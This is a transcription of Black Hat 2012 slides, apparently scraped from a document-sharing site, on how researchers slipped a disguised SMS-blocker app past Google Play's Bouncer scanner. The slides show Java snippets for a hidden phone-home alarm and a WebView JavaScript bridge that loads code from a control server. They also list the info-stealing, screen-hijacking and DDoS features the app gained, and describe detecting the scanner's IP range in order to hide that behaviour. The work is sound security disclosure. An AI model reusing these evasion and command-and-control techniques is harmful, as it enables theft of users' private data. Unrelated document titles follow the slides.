Adventures in Bouncerland. Nicholas J. Percoco Sean Schulte Trustwave SpiderLabs
|
|
|
- Ernest Payne
- 10 years ago
- Views:
Transcription
1 Adventures in Bouncerland Nicholas J. Percoco Sean Schulte Trustwave SpiderLabs
2 Agenda Introduc5ons Our Mo5va5ons What We Knew About Bouncer Research Approach & Process Phase 0 Phase 1 7 Final Test What We Learned About Bouncer Conclusions
3 INTRODUCTIONS
4 Introduc>ons About Nick Started InfoSec Career in the 1990s Formed SpiderLabs at Trustwave in rd talk at Black Hat, DEF CON (6 5mes), Briefings for DHS, US- CERT, and United State Secret Service Research areas include Data Breaches, Malware, and Mobile Compu5ng Primary Author of the annual Trustwave Global Security on Twi`er
5 Introduc>ons About Sean Backend SSL services developer at Trustwave Writes mobile apps and video games Performs malware analysis on Android Discovered design flaw in Android Presented at DEF CON on Twi`er
6 Introduc>ons The Problem Mobile Malware rarely make an appearance Security Researchers, yes. General Public, no. Consumer Devices Lacks good built- in ac5vity visibility Targeted a`acks are happening Wide- spread catastrophes around the corner
7 Introduc>ons Our Experience Targeted Mobile A`acks Exist Never make media reports How many go undetected? Android and ios malware gets personal Pinpoints: Where you are? What you are doing? Record your ac5vi5es digital and physical worlds
8 Introduc>ons Mobile Markets Top of Mind is APP SALES! These are major revenue generators! Everyone s dying to get into Apple s App Store They can make the barrier very high Google Android developers can publish easily This was mo5vated by business, not security. Created a major problem for Google Bouncer was their answer
9 OUR MOTIVATIONS
10 Our Mo>va>ons - Google Google is one of the largest tech companies The best search technology Crazy future- crea5ng research projects 800,000 Android devices ac5vated EVERY DAY Android gets them $1.70 per device per year 1 Es5mated $400 Million in Horace Dediu s analysis (h`p:// economics)
11 Our Mo>va>ons Reac>ve Markets Historically mobile markets were reac5ve The world finds all types of mobile malware Mostly Zeus, SpyEye, and SMS hijack variants Low barriers of entry, make a criminal happy Results: Lots of malware, no one detec5ng it
12 Our Mo>va>ons Bouncer Revealed Reac5ve approach is a losing ba`le Criminals can create malware faster than people will ever detect and report it Google came to the same conclusion Funded Bouncer with some of that $400M Formally announced on February 2 nd, h`p://googlemobile.blogspot.com/2012/02/android- and- security.html
13 Our Mo>va>ons Curious, we are. In the age of Bouncer : How difficult would it be to slip some malware past him? How long could we perform research before gesng caught? The results would benefit all app market owners, not just Google. Thus, began our Adventures in Bouncerland!
14 WHAT WE KNEW ABOUT BOUNCER
15 What We Knew About Bouncer Before February 2 nd, 2012 only Google knew Bouncer existed We learned from Google 3 : It s automated. Scans new and old Stops known malware immediately Behavior based Runs in Google s Cloud, simulates Android run5me Looks for hidden, malicious behavior 3 - h`p://googlemobile.blogspot.com/2012/02/android- and- security.html
16 What We Knew About Bouncer Bouncer s descrip5on sounded scary Lot of hurdles to overcome to be a successful malware developer for Android now We expected to fail hard.
17 RESEARCH APPROACH & PROCESS
18 Research Approach & Process - Rules All of our previous Android research was 100% lab based Tes5ng Bouncer would mean u5lizing Google s resources We needed to establish rules to avoid problems
19 Research Approach & Process - Rules Rule 1: We will not a`empt to obtain access to Google s infrastructure beyond what is already supplied during the normal applica5on review process. Roo5ng and Remote Shells is prohibited. This would be irresponsible and likely illegal.
20 Research Approach & Process - Rules Rule 2: We would put controls in place that would reduce the chance of an end- user downloading malware we placed within the marketplace and that it would not execute if downloaded. We paid very close a`en5on to this every step of the way.
21 Research Approach & Process - Goals Established a legi5mate Android developer account Test the bounds of Bouncer malware detec5on Using only legi5mate tools provided in the SDK Look for ways to hide malicious func5onality Record our results to help improve how this is being done
22 Phase 0 Build a Benign App Developed a fully func5onal benign app The applica5on was one that is very common One of the factors to mi5gate the chance of someone else downloading it We did not trust that Bouncer was fully automated A sloppy test app would stand out quickly
23 Phase 0 Meet SMS Bloxor It s a SMS Blocker!
24 Phase 0 SMS Bloxor Phone Home We needed to know if our app was being scanned by Bouncer Bouncer might allow apps to access the Internet We added a simple BroadcastReceiver.
25 Phase 0 SMS Bloxor Phone Home <receiver android:name=".receiver.communicationreceiver" /> In our BroadcastReceiver, we schedule it to run itself again in the future using a PendingIntent and the AlarmManager. Intent alarmintent = new Intent(context, CommunicationReceiver.class); PendingIntent pendingintent = PendingIntent.getBroadcast(context, 0, alarmintent, PendingIntent.FLAG_UPDATE_CURRENT); AlarmManager alarmmanager = (AlarmManager)context.getSystemService(Context.ALARM_SERVICE); alarmmanager.set(alarmmanager.rtc_wakeup, nexttime(), pendingintent);
26 Phase 0 SMS Bloxor Phone Home It will phone home even when it is asleep Will NOT appear in the list of currently running apps In this phase, our backend server is just recording IP and basic informa5on with the request.
27 SMS Bloxor Benign Demo
28 Phase 0 Let s Publish It! Crea5ng a Google Android Developer account is quick and painless. Selling apps takes an addi5onal step of linking in an ac5ve Google Checkout (merchant) account. Total effort took less than 60 minutes!
29 Phase 0 Let s Publish It! We then populated all the required fields and uploaded our APK file.
30 Phase 0 Let s Publish It! We wanted to mi5gate the chance of an end user downloading our app. Most other SMS Blockers are either free or less than $2.00. We priced ours at $49.95
31 Phase 0 Bouncer Appears Within a few minutes, our back end control system received a web request: We now know more about Bouncer : He scans upon publishing and likely automated. The IP belonged to Google. Bouncer wants everyone to think he is an actual device, not an emulator.
32 Phase 0 Let s Try That Again Never build off of a single test. We waited a day and published version Bouncer scanned us again. Different IP, but same network block.
33 SMS Bloxor in the Market
34 Phase 1 7 From Benign to Evil We knew where Bouncer lived. We made SMS Bloxor have two modes: If run within Google, don t execute maliciously. If run outside* of Google, run maliciously. * We defined outside as within Trustwave s network for this research.
35 Phase 1 7 From Benign to Evil We also wanted to avoid manual review detec5on. Having both malicious and non- malicious func5onality in the app would certainly sound alarms during code review. We turned to a legi5mate technique allowed by Google for a solu5on.
36 Phase 1 7 From Benign to Evil Facebook s app lives inside a na5ve wrapper. This allows the app to live along side all the other Android apps. It also allows Facebook to update the HTML and Javascript func5onality without having to update the app. Facebook s app can dynamically enable OS- level func5onality through Android s Javascript bridge.
37 Phase 1 7 From Benign to Evil Facebook s app can dynamically enable OS- level func5onality through Android s Javascript bridge. This means ANY app that is using Android s Javascript bridge could become malware at any >me axer the review process.
38 Phase 1 7 From Benign to Evil If it works for Facebook, it ll work for us: WebView webview = new WebView(context); webview.getsettings().setjavascriptenabled(true); webview.addjavascriptinterface(bridge, "Bridge"); webview.loaddata(rawfilereader.readfile(webview.getc ontext(), R.raw.default_js), "text/html", "UTF-8"); When we need to load new func5onality: webview.posturl(api_endpoint, postdata(bridge));
39 Phase 1 7 From Benign to Evil Avoiding detec5on was our goal! We always included legi5mate func5onality within SMS Bloxor that mirrored the malicious func5onality we wanted. We could also now turn our control server in a Command & Control (C&C) server via Javascript bridge.
40 SMS Bloxor Phases 1-7 Phase Version Legit Malware Scan Detect Select block numbers from contacts Select block numbers from SMS history See your own phone number Select photos to associate with blocked numbers Select block numbers from phone history Steal all contacts Yes No Steal all SMS records Yes No Complete phone recon Steal all photos on device Steal all phone records No Yes Yes Added adver5sements Hijack users screen Yes No Add analy5cs DDoS any website Yes No No No No
41 SMS Bloxor Command & Control
42 Final Test Let s Get Caught We were successful at crea5ng a mobile info- stealing botnet and gesng it published without detec5on. We turned off the IP block and submi`ed another version. We s5ll did not get caught.
43 Final Test Let s Get Caught Changed interval from 15 minutes to 1 second We angered Bouncer He scanned us 19 5mes within 6 minutes But we did get data back
44 Final Test Let s Get Caught Contacts: & Phone Number: Voic ANDROID_ID: 9774d56d682e549c Device ID: Subscriber ID: SIM Serial Number:
45 Final Test Let s Get Caught And we also received this:
46 SMS Bloxor Evil Demo Steals your contacts Uploads your SMS history Fingerprints your device Grabs all your photos Uploads your call records Hijacks your screen Makes your device part of a botnet
47 WHAT WE LEARNED ABOUT BOUNCER
48 What We Learned Bouncer Flaws Everything Google said about Bouncer was true. It s main weakness is that developers can easily determine when their app are being run by it. Android also allows any developer to bypass this process via a Javascript bridge.
49 What We Learned A Be^er Bouncer A be`er Bouncer would consist of other entry and end- point evalua5ons. Bouncer would run the apps for longer than a few minutes to verify func5onality. Developers would be required to submit func5onality maps with their APKs. End- users would receive these maps with each download and their devices would prevent ac5ons outside of those maps. Javascript bridges must be strictly limited.
50 CONCLUSIONS
51 Conclusions These issues are going to affect both public and private markets being used today and developed for tomorrow. Applica5on markets with malware detec5on can easily be bypassed. Both automated and manual reviews Unless malware detec5on is built- in to the OS, developers will always find ways to bypass pre- entry detec5on.
52 QUESTIONS?
53 Adventures in Bouncerland Nicholas J. Percoco Sean Schulte Trustwave SpiderLabs Please make sure you fill out the Black Hat Evalua>on Form!
Black Hat USA 2012. Adventures in BouncerLand. Failures of Automated Malware Detection within Mobile Application Markets
Black Hat USA 2012 Adventures in BouncerLand Failures of Automated Malware Detection within Mobile Application Markets Nicholas J. Percoco Sean Schulte 70 W. Madison Street, Suite 1050 Chicago, IL 60602
Kaseya Fundamentals Workshop DAY THREE. Developed by Kaseya University. Powered by IT Scholars
Kaseya Fundamentals Workshop DAY THREE Developed by Kaseya University Powered by IT Scholars Kaseya Version 6.5 Last updated March, 2014 Day Two Overview Day Two Lab Review Patch Management Configura;on
This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.
The hidden risks of mobile applications This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit. To learn more about TraceSecurity visit www.tracesecurity.com
CYBERCRIMINAL IN BRAZIL SHARES MOBILE CREDIT CARD STORE APP
CYBERCRIMINAL IN BRAZIL SHARES MOBILE CREDIT CARD STORE APP August 2014 RSA agents recently traced a threat actor advertising a mobile credit card store application. The cybercriminal shared the information
How Attackers are Targeting Your Mobile Devices. Wade Williamson
How Attackers are Targeting Your Mobile Devices Wade Williamson Today s Agenda Brief overview of mobile computing today Understanding the risks Analysis of recently discovered malware Protections and best
Incident Response Using Splunk for State and Local Governments
Copyright 2013 Splunk Inc. Incident Response Using Splunk for State and Local Governments Bert Hayes Solu=ons Engineer [email protected] #splunkconf Legal No=ces During the course of this presenta=on, we
A Publication of FastSpring. FastSpring. Advertiser. QuickStart Guide. Ten Steps to Get Up and Running Quickly in the FastSpring Affiliate Program
A Publication of FastSpring FastSpring Advertiser QuickStart Guide Ten Steps to Get Up and Running Quickly in the FastSpring Affiliate Program Welcome to the FastSpring Affiliate Program (powered by Impact
Introduction to Android
Introduction to Android 26 October 2015 Lecture 1 26 October 2015 SE 435: Development in the Android Environment 1 Topics for Today What is Android? Terminology and Technical Terms Ownership, Distribution,
Assessing BYOD with the Smarthpone Pentest Framework. Georgia Weidman
Assessing BYOD with the Smarthpone Pentest Framework Georgia Weidman BYOD Is Not New Contractor Laptop Rogue Access Point Gaming Console Tradi>onal Vulnerability Scanning The iphone in Ques>on Is
How To Use Splunk For Android (Windows) With A Mobile App On A Microsoft Tablet (Windows 8) For Free (Windows 7) For A Limited Time (Windows 10) For $99.99) For Two Years (Windows 9
Copyright 2014 Splunk Inc. Splunk for Mobile Intelligence Bill Emme< Director, Solu?ons Marke?ng Panos Papadopoulos Director, Product Management Disclaimer During the course of this presenta?on, we may
ios Security The Never-Ending Story of Malicious Profiles Adi Sharabani Yair Amit CEO & Co-Founder Skycure CTO & Co-Founder Skycure @AdiSharabani
ios Security The Never-Ending Story of Malicious Profiles SESSION ID: BR-R02 Adi Sharabani CEO & Co-Founder Skycure @AdiSharabani Yair Amit CTO & Co-Founder Skycure @YairAmit About the Presenters Yair
Blue Medora VMware vcenter Opera3ons Manager Management Pack for Oracle Enterprise Manager
Blue Medora VMware vcenter Opera3ons Manager Management Pack for Oracle Enterprise Manager Oracle WebLogic J2EE on VMware Monitoring 203 Blue Medora LLC All rights reserved WebLogic on VMware Management
Trend Micro Incorporated Research Paper 2012. Adding Android and Mac OS X Malware to the APT Toolbox
Trend Micro Incorporated Research Paper 2012 Adding Android and Mac OS X Malware to the APT Toolbox Contents Abstract... 1 Introduction... 1 Technical Analysis... 2 Remote Access Trojan Functionality...
Android Security Evaluation Framework
INTRODUCING... A S E F Android Security Evaluation Framework - Parth Patel $ whoami_ Agenda Manual Research Automation - A S E F Let s solve problems Conclusion Android OS Open Source Security Evaluation
Kaspersky Security for Mobile
Kaspersky Security for Mobile See. Control. Protect. MOVING TARGETS Mobile devices play a key role in connectivity and productivity. But they also introduce new risks to the business: in the past 12 months
Computer Security Incident Handling Detec6on and Analysis
Computer Security Incident Handling Detec6on and Analysis Jeff Roth, CISSP- ISSEP, CISA, CGEIT Senior IT Security Consultant 1 Coalfire Confiden+al Agenda 2 SECURITY INCIDENT CONTEXT TERMINOLOGY DETECTION
HOW TO CREATE APPS FOR TRAINING. A step- by- step guide to crea2ng a great training app for your company
HOW TO CREATE APPS FOR TRAINING A step- by- step guide to crea2ng a great training app for your company From compliance and health & safety to employee induction and self-assessment, there are endless
DEF CON 19: Getting SSLizzard. Nicholas J. Percoco Trustwave SpiderLabs Paul Kehrer Trustwave SSL
DEF CON 19: Getting SSLizzard Nicholas J. Percoco Trustwave SpiderLabs Paul Kehrer Trustwave SSL Agenda Introductions Primer / History: SSL and MITM Attacks Mobile SSL User Experience Research Motivations
Tutorial on Smartphone Security
Tutorial on Smartphone Security Wenliang (Kevin) Du Professor [email protected] Smartphone Usage Smartphone Applications Overview» Built-in Protections (ios and Android)» Jailbreaking and Rooting» Security
No Cloud Allowed. Denying Service to DDOS Protection Services
No Cloud Allowed Denying Service to DDOS Protection Services Presented by: Allison Nixon [email protected] Pentesting, Incident Response PaulDotCom host Cloud Based DDOS Protection How it works
Splunk and Big Data for Insider Threats
Copyright 2014 Splunk Inc. Splunk and Big Data for Insider Threats Mark Seward Sr. Director, Public Sector Company Company (NASDAQ: SPLK)! Founded 2004, first sohware release in 2006! HQ: San Francisco
Administrator's Guide
Administrator's Guide Copyright SecureAnywhere Mobile Protection Administrator's Guide November, 2012 2012 Webroot Software, Inc. All rights reserved. Webroot is a registered trademark and SecureAnywhere
Kaspersky Lab Mobile Device Management Deployment Guide
Kaspersky Lab Mobile Device Management Deployment Guide Introduction With the release of Kaspersky Security Center 10.0 a new functionality has been implemented which allows centralized management of mobile
The Increasing Threat of Malware for Android Devices. 6 Ways Hackers Are Stealing Your Private Data and How to Stop Them
The Increasing Threat of Malware for Android Devices 6 Ways Hackers Are Stealing Your Private Data and How to Stop Them INTRODUCTION If you own a smartphone running the Android operating system, like the
Junos Pulse for Google Android
Junos Pulse for Google Android User Guide Release 4.0 October 2012 R1 Copyright 2012, Juniper Networks, Inc. Juniper Networks, Junos, Steel-Belted Radius, NetScreen, and ScreenOS are registered trademarks
From Georgia, with Love Win32/Georbot. Is someone trying to spy on Georgians?
From Georgia, with Love Win32/Georbot Is someone trying to spy on Georgians? At the beginning of the year, a curious piece of malware came to our attention. An analyst in our virus laboratory noticed that
Splunk for Networking and SDN
Copyright 2013 Splunk Inc. Splunk for Networking and SDN Stela Udovicic Senior Product Marke?ng Manager, Splunk #splunkconf Legal No?ces During the course of this presenta?on, we may make forward- looking
Introducing A S E F - Android Security Evaluation Framework
Introducing A S E F - Android Security Evaluation Framework An idea making a journey through different paths of Android Security to reach a destination that may only be pursued with the help of a community.
Mobile Application Hacking for Android and iphone. 4-Day Hands-On Course. Syllabus
Mobile Application Hacking for Android and iphone 4-Day Hands-On Course Syllabus Android and iphone Mobile Application Hacking 4-Day Hands-On Course Course description This course will focus on the techniques
Defending Against Web App A0acks Using ModSecurity. Jason Wood Principal Security Consultant Secure Ideas
Defending Against Web App A0acks Using ModSecurity Jason Wood Principal Security Consultant Secure Ideas Background Info! Penetra?on Tester, Security Engineer & Systems Administrator!!!! Web environments
DNS Traffic Monitoring. Dave Piscitello VP Security and ICT Coordina;on, ICANN
DNS Traffic Monitoring Dave Piscitello VP Security and ICT Coordina;on, ICANN Domain Names ICANN coordinates the administra2on of global iden2fier systems Domain names provide user friendly identification
Mobile Phone & Website Tracking Platform Operation Guide
Mobile Phone & Website Tracking Platform Operation Guide This software is web based system, for users to logon with given user name & password to locate the tracker s current location, play back the history
User Guide FOR TOSHIBA STORAGE PLACE
User Guide FOR TOSHIBA STORAGE PLACE (This page left blank for 2-sided "book" printing.) Table of Contents Overview... 5 System Requirements... 5 Storage Place Interfaces... 5 Getting Started... 6 Using
Kaspersky Security 10 for Mobile Implementation Guide
Kaspersky Security 10 for Mobile Implementation Guide APPLICATION VERSION: 10.0 MAINTENANCE RELEASE 1 Dear User, Thank you for choosing our product. We hope that you will find this documentation useful
Main Research Gaps in Cyber Security
Comprehensive Approach to cyber roadmap coordina5on and development Main Research Gaps in Cyber Security María Pilar Torres Bruna everis Aerospace and Defence Index CAMINO WP2: Iden8fica8on and Analysis
MOBILE APPS. QA Testing for mobile applications
MOBILE APPS QA Testing for mobile applications How familiar are you with Apple devices? This question can be asked for apple devices as well as Android devices - depending on the company your interviewing
Advancements in Botnet Attacks and Malware Distribution
Advancements in Botnet Attacks and Malware Distribution HOPE Conference, New York, July 2012 Aditya K Sood Rohit Bansal Richard J Enbody SecNiche Security Department of Computer Science and Engineering
BYPASSING THE ios GATEKEEPER
BYPASSING THE ios GATEKEEPER AVI BASHAN Technology Leader Check Point Software Technologies, Ltd. OHAD BOBROV Director, Mobile Threat Prevention Check Point Software Technologies, Ltd. EXECUTIVE SUMMARY
Computer Security DD2395
Computer Security DD2395 http://www.csc.kth.se/utbildning/kth/kurser/dd2395/dasakh11/ Fall 2011 Sonja Buchegger [email protected] Lecture 7 Malicious Software DD2395 Sonja Buchegger 1 Course Admin Lab 2: - prepare
Offensive & Defensive & Forensic Techniques for Determining Web User Iden<ty
Offensive & Defensive & Forensic Techniques for Determining Web User Iden
2012 Global Threats and Trends
2012 Global Threats and Trends Presented by: Nicholas J. Percoco Trustwave SVP & Head of SpiderLabs Agenda Introduction 2011 Incident Investigations The Breach Triad Malware Trends Security Weaknesses
Mobile Applica,on and BYOD (Bring Your Own Device) Security Implica,ons to Your Business. Dmitry Dessiatnikov
Mobile Applica,on and BYOD (Bring Your Own Device) Security Implica,ons to Your Business Dmitry Dessiatnikov DISCLAIMER All informa,on in this presenta,on is provided for informa,on purposes only and in
The Best Mobile App Development Platform. Period.
The Best Mobile App Development Platform. Period. Native Apps. Code-Free. Cross-Platform. In Hours. It s a Block Party and everyone s invited! Use snap together building blocks to quickly and easily assemble
Symantec's Secret Sauce for Mobile Threat Protection. Jon Dreyfus, Ellen Linardi, Matthew Yeo
Symantec's Secret Sauce for Mobile Threat Protection Jon Dreyfus, Ellen Linardi, Matthew Yeo 1 Agenda 1 2 3 4 Threat landscape and Mobile Insight overview What s unique about Mobile Insight Mobile Insight
Mobile Operating Systems & Security
Mobile Operating Systems & Security How can I protect myself? Operating Systems Android Apple Microsoft What do they do? operate smartphones, tablets, watches and other mobile devices includes touchscreens
Kaspersky Endpoint Security 8 for Smartphone for Android OS
Kaspersky Endpoint Security 8 for Smartphone for Android OS User Guide PROGRAM VERSION: 8.0 Dear User! Thank you for choosing our product. We hope that this documentation will help you in your work and
Security A to Z the most important terms
Security A to Z the most important terms Part 1: A to D UNDERSTAND THE OFFICIAL TERMINOLOGY. This is F-Secure Labs. Learn more about the most important security terms with our official explanations from
U.S. Cellular Mobile Data Security. User Guide Version 00.01
U.S. Cellular Mobile Data Security User Guide Version 00.01 Table of Contents Install U.S. Cellular Mobile Data Security...3 Activate U.S. Cellular Mobile Data Security...3 Main Interface...3 Checkup...4
Kaspersky Security for Mobile Administrator's Guide
Kaspersky Security for Mobile Administrator's Guide APPLICATION VERSION: 10.0 SERVICE PACK 1 Dear User, Thank you for choosing our product. We hope that you will find this documentation useful and that
Bell Mobile Device Management (MDM)
Bell MDM Technical FAQs 1 Bell Mobile Device Management (MDM) Frequently Asked Questions INTRODUCTION Bell Mobile Device Management provides business customers an all in one device administration tool
NGFW is yesterdays news what is next in scope for the firewall in the threat intelligence age
NGFW is yesterdays news what is next in scope for the firewall in the threat intelligence age Dynamic Threat Protection for Enterprise Edge and Data Center Rasmus Andersen Lead Security Sales Specialist
Member Municipality Security Awareness Training. End- User Informa/on Security Awareness Training
End- User Informa/on Security Awareness Training 1 Why Awareness Training? NCLM sanc:oned mul:ple Security Risk Assessments for a broad spectrum of member municipali:es The assessments iden:fied areas
Protec'ng Communica'on Networks, Devices, and their Users: Technology and Psychology
Protec'ng Communica'on Networks, Devices, and their Users: Technology and Psychology Alexey Kirichenko, F- Secure Corpora7on ICT SHOK, Future Internet program 30.5.2012 Outline 1. Security WP (WP6) overview
Defending Behind The Device Mobile Application Risks
Defending Behind The Device Mobile Application Risks Tyler Shields Product Manager and Strategist Veracode, Inc Session ID: MBS-301 Session Classification: Advanced Agenda The What The Problem Mobile Ecosystem
Report on Consumer Behaviors and Perceptions of Mobile Security. Presented by NQ Mobile & NCSA January 25, 2012
Report on Consumer Behaviors and Perceptions of Mobile Security Presented by NQ Mobile & NCSA January 25, 2012 Methodology Online survey of 1,158 consumers. Participants had to own a smartphone. Respondents
Norton Mobile Privacy Notice
Effective: April 12, 2016 Symantec and the Norton brand have been entrusted by consumers around the world to protect their computing devices and most important digital assets. This Norton Mobile Privacy
Comodo Mobile Security for Android Software Version 3.0
Comodo Mobile Security for Android Software Version 3.0 User Guide Guide Version 3.0.042115 Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013 Table of Contents 1. Introduction to Comodo Mobile
DETERMINATION OF THE PERFORMANCE
DETERMINATION OF THE PERFORMANCE OF ANDROID ANTI-MALWARE SCANNERS AV-TEST GmbH Klewitzstr. 7 39112 Magdeburg Germany www.av-test.org 1 CONTENT Determination of the Performance of Android Anti-Malware Scanners...
Shellshock. Oz Elisyan & Maxim Zavodchik
Shellshock By Oz Elisyan & Maxim Zavodchik INTRODUCTION Once a high profile vulnerability is released to the public, there will be a lot of people who will use the opportunity to take advantage on vulnerable
How To Use Titanium Studio
Crossplatform Programming Lecture 3 Introduction to Titanium http://dsg.ce.unipr.it/ http://dsg.ce.unipr.it/?q=node/37 [email protected] 2015 Parma Outline Introduction Installation and Configuration
Mobile App Testing Process INFLECTICA TECHNOLOGIES (P) LTD
Mobile App Testing Process Mobile Application Testing Strategy EMULATOR QA team can perform most of the testing in a well-equipped test environment using device emulators with various options like ability
Protecting Android Mobile Devices from Known Threats
Protecting Android Mobile Devices from Known Threats Android OS A Popular Target for Hacks White Paper Zero Trust Mobile Security An Introduction to the BETTER Mobile Security Platform BETTER at work.
Analysis of advanced issues in mobile security in android operating system
Available online atwww.scholarsresearchlibrary.com Archives of Applied Science Research, 2015, 7 (2):34-38 (http://scholarsresearchlibrary.com/archive.html) ISSN 0975-508X CODEN (USA) AASRC9 Analysis of
Kony Mobile Application Management (MAM)
Kony Mobile Application Management (MAM) Kony s Secure Mobile Application Management Feature Brief Contents What is Mobile Application Management? 3 Kony Mobile Application Management Solution Overview
Hong Kong Information Security Outlook 2015 香 港 資 訊 保 安 展 望
Hong Kong Information Security Outlook 2015 香 港 資 訊 保 安 展 望 Agenda Information Security Trends Year 2014 in Review Outlook for 2015 Advice to the Public Hong Kong Computer Emergency Response Team Coordination
Computer Networks. Examples of network applica3ons. Applica3on Layer
Computer Networks Applica3on Layer 1 Examples of network applica3ons e- mail web instant messaging remote login P2P file sharing mul3- user network games streaming stored video clips social networks voice
Android (in)security. Having fun with Android. Sarantis Makoudis
Android (in)security Having fun with Android Sarantis Makoudis About Me BSc in Digital Systems, University of Piraeus, 2010 MSc in Information Security, Royal Holloway, University of London,2012 Penetration
Design and Evalua.on of a Real- Time URL Spam Filtering Service
Design and Evalua.on of a Real- Time URL Spam Filtering Service Kurt Thomas, Chris Grier, Jus.n Ma, Vern Paxson, Dawn Song University of California, Berkeley Interna.onal Computer Science Ins.tute Mo.va.on
ASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
ISSA Phoenix Chapter Meeting Topic: Security Enablement & Risk Reducing Best Practices for BYOD + SaaS Cloud Apps
ISSA Phoenix Chapter Meeting Topic: Security Enablement & Risk Reducing Best Practices for BYOD + SaaS Cloud Apps Agenda Security Enablement Concepts for BYOD & SaaS Cloud Apps! Intro and background! BYOD
Nodes, Ties and Influence
Nodes, Ties and Influence Chapter 2 Chapter 2, Community Detec:on and Mining in Social Media. Lei Tang and Huan Liu, Morgan & Claypool, September, 2010. 1 IMPORTANCE OF NODES 2 Importance of Nodes Not
Future of Mobile App Security. Vincent Sritapan Program Manager Cyber Security Division Science and Technology Directorate
Future of Mobile App Security Vincent Sritapan Program Manager Cyber Security Division Science and Technology Directorate Do You Know What Your Apps Are Doing? Spying Microphone & camera surveillance $
THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS. Junos WebApp Secure Junos Spotlight Secure
THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS Junos WebApp Secure Junos Spotlight Secure SECURITY AT JUNIPER Customer segments Business segments Service providers, enterprise Routing,
Hunk & Elas=c MapReduce: Big Data Analy=cs on AWS
Copyright 2014 Splunk Inc. Hunk & Elas=c MapReduce: Big Data Analy=cs on AWS Dritan Bi=ncka BD Solu=ons Architecture Disclaimer During the course of this presenta=on, we may make forward looking statements
Stream Deployments in the Real World: Enhance Opera?onal Intelligence Across Applica?on Delivery, IT Ops, Security, and More
Copyright 2015 Splunk Inc. Stream Deployments in the Real World: Enhance Opera?onal Intelligence Across Applica?on Delivery, IT Ops, Security, and More Stela Udovicic Sr. Product Marke?ng Manager Clayton
Some Security Challenges of Cloud Compu6ng. Kui Ren Associate Professor Department of Computer Science and Engineering SUNY at Buffalo
Some Security Challenges of Cloud Compu6ng Kui Ren Associate Professor Department of Computer Science and Engineering SUNY at Buffalo Cloud Compu6ng: the Next Big Thing Tremendous momentum ahead: Prediction
